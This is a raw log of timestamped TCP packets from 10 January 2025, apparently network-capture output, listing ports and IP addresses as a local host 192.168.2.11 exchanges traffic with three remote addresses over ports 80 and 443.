Jan 10, 2025 17:09:12.862008095 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.862047911 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.864164114 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.864201069 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.864209890 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.864242077 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.866400003 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.866447926 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.866458893 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.866506100 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.868588924 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.868633986 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.868643045 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.868683100 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.870734930 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.870776892 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.870809078 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.870850086 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.873063087 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.873104095 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.873218060 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.873255014 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.875044107 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.875093937 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.875102043 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.875140905 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.877182007 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.877218962 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.877234936 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.877273083 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.879348040 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.879390955 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.879396915 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.879436016 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.881428003 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.881462097 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.881469965 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.881500959 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.883558035 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.883596897 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.883604050 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.883647919 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.885653019 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.885699987 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.885705948 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.885740042 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.887773037 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.887811899 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.887821913 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.887860060 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.890218019 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.890265942 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.890280008 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.890314102 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.891777039 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.891840935 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.891849995 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.891890049 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.894902945 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.894943953 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.894953966 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.894994974 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.895900965 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.895941019 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.895946980 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.895992994 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.899698019 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.899780989 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.899791002 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.899827957 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.900055885 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.900089979 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.900096893 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.900156975 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.904485941 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.904529095 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.904531002 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.904542923 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.904572964 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.904616117 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.904632092 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.904664040 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.904670000 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.904706001 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.911135912 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.911190033 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.911195040 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.911211967 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.911226988 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.911271095 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.911587000 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.911633015 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.914608002 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.914648056 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.914657116 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.914678097 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.914696932 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.914705038 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.914720058 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.914752960 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.917853117 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.917901993 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.917908907 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.917947054 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.918026924 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.918060064 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.918077946 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.918113947 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.922238111 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.922285080 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.922291994 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.922321081 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.922331095 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.922337055 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.922358036 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.922395945 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.926389933 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.926436901 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.926448107 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.926485062 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.926598072 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.926635027 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.926640987 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.926678896 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.930598974 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.930653095 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.930659056 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.930692911 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.930696011 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.930706978 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.930730104 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.930752993 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.931493998 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.931529045 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.936553001 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.936593056 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.936608076 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.936640978 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.936646938 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.936685085 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.937026978 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.937063932 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.937072992 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.937104940 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.937112093 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.937153101 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.937496901 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.937531948 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.937536001 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.937571049 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.937834978 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.937869072 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.937875986 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.937906027 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.937911034 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.937956095 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.939158916 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.939277887 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.940172911 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.940213919 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.940221071 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.940248966 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.940267086 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.940272093 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.940282106 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.940311909 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.942141056 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.942184925 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.942267895 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.942301989 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.942306042 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.942339897 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.942346096 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.942378998 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.944500923 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.944544077 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.944549084 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.944586992 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.946827888 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.946866989 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.946885109 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.946918011 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.946919918 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.946933031 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.946955919 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.946980953 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.951385975 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.951436043 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.951441050 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.951481104 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.951488018 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.951493979 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.951514006 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.951546907 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.951551914 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.951594114 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.958115101 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.958159924 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.958165884 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.958219051 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.958220959 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.958235979 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.958255053 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.958287954 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.958353043 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.958389044 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.958411932 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:12.958452940 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.989921093 CET	49982	443	192.168.2.11	142.250.186.33
Jan 10, 2025 17:09:12.989947081 CET	443	49982	142.250.186.33	192.168.2.11
Jan 10, 2025 17:09:14.042284966 CET	49983	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:14.048266888 CET	80	49983	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:14.048347950 CET	49983	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:14.048603058 CET	49983	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:14.053426027 CET	80	49983	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:14.633600950 CET	80	49983	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:14.639636993 CET	49983	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:14.644479990 CET	80	49983	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:14.802612066 CET	80	49983	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:14.955498934 CET	49983	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:15.381119967 CET	49984	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:15.381170988 CET	443	49984	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:15.381242990 CET	49984	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:15.382967949 CET	49984	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:15.382982016 CET	443	49984	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:15.869332075 CET	443	49984	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:15.869452000 CET	49984	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:15.874133110 CET	49984	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:15.874145985 CET	443	49984	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:15.874516964 CET	443	49984	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:15.877290964 CET	49984	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:15.919348001 CET	443	49984	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:16.015197039 CET	443	49984	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:16.015264034 CET	443	49984	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:16.015326023 CET	49984	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:16.020114899 CET	49984	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:16.083961964 CET	49983	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:16.088887930 CET	80	49983	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:16.246877909 CET	80	49983	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:16.329963923 CET	49985	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:16.330018997 CET	443	49985	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:16.330104113 CET	49985	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:16.337181091 CET	49985	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:16.337193966 CET	443	49985	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:16.346143007 CET	49983	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:16.806668997 CET	443	49985	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:16.808370113 CET	49985	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:16.808384895 CET	443	49985	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:16.958466053 CET	443	49985	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:16.958549976 CET	443	49985	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:16.958594084 CET	49985	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:16.959609032 CET	49985	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:16.966958046 CET	49983	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:16.968759060 CET	49986	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:16.972625971 CET	80	49983	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:16.972700119 CET	49983	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:16.973573923 CET	80	49986	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:16.973642111 CET	49986	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:16.973779917 CET	49986	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:16.979023933 CET	80	49986	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:17.539443970 CET	80	49986	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:17.539679050 CET	49986	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:17.540901899 CET	49987	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:17.540947914 CET	443	49987	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:17.541014910 CET	49987	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:17.541294098 CET	49987	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:17.541302919 CET	443	49987	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:17.544759035 CET	80	49986	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:17.544830084 CET	49986	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:18.028744936 CET	443	49987	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:18.030750036 CET	49987	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:18.030786991 CET	443	49987	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:18.167484999 CET	443	49987	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:18.167558908 CET	443	49987	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:18.167664051 CET	49987	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:18.168708086 CET	49987	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:18.175555944 CET	49988	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:18.180350065 CET	80	49988	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:18.180722952 CET	49988	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:18.180881977 CET	49988	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:18.185611963 CET	80	49988	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:18.782689095 CET	80	49988	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:18.784143925 CET	49989	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:18.784193039 CET	443	49989	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:18.784257889 CET	49989	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:18.784554958 CET	49989	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:18.784568071 CET	443	49989	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:18.830514908 CET	49988	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:19.282058954 CET	443	49989	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:19.283946037 CET	49989	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:19.283988953 CET	443	49989	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:19.414200068 CET	443	49989	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:19.414370060 CET	443	49989	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:19.414452076 CET	49989	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:19.414833069 CET	49989	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:19.418560028 CET	49988	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:19.419692993 CET	49990	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:19.423573971 CET	80	49988	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:19.423640966 CET	49988	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:19.424634933 CET	80	49990	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:19.424738884 CET	49990	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:19.424822092 CET	49990	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:19.429558039 CET	80	49990	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:20.918354988 CET	80	49990	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:20.920967102 CET	49991	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:20.921006918 CET	443	49991	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:20.921082020 CET	49991	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:20.921727896 CET	49991	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:20.921744108 CET	443	49991	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:20.971271038 CET	49990	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:21.386110067 CET	443	49991	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:21.387900114 CET	49991	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:21.387936115 CET	443	49991	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:21.545782089 CET	443	49991	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:21.545872927 CET	443	49991	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:21.546024084 CET	49991	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:21.546762943 CET	49991	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:21.550523043 CET	49990	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:21.551805973 CET	49992	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:21.556305885 CET	80	49990	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:21.556385994 CET	49990	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:21.557970047 CET	80	49992	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:21.558078051 CET	49992	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:21.558166981 CET	49992	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:21.564066887 CET	80	49992	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:22.147300959 CET	80	49992	158.101.44.242	192.168.2.11
Jan 10, 2025 17:09:22.148762941 CET	49993	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:22.148813009 CET	443	49993	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:22.148978949 CET	49993	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:22.149219990 CET	49993	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:22.149234056 CET	443	49993	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:22.189944983 CET	49992	80	192.168.2.11	158.101.44.242
Jan 10, 2025 17:09:22.609638929 CET	443	49993	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:22.611345053 CET	49993	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:22.611360073 CET	443	49993	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:22.740648031 CET	443	49993	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:22.740716934 CET	443	49993	104.21.80.1	192.168.2.11
Jan 10, 2025 17:09:22.740928888 CET	49993	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:22.741530895 CET	49993	443	192.168.2.11	104.21.80.1
Jan 10, 2025 17:09:22.746511936 CET	49992	80	192.168.2.11	158.101.44.242
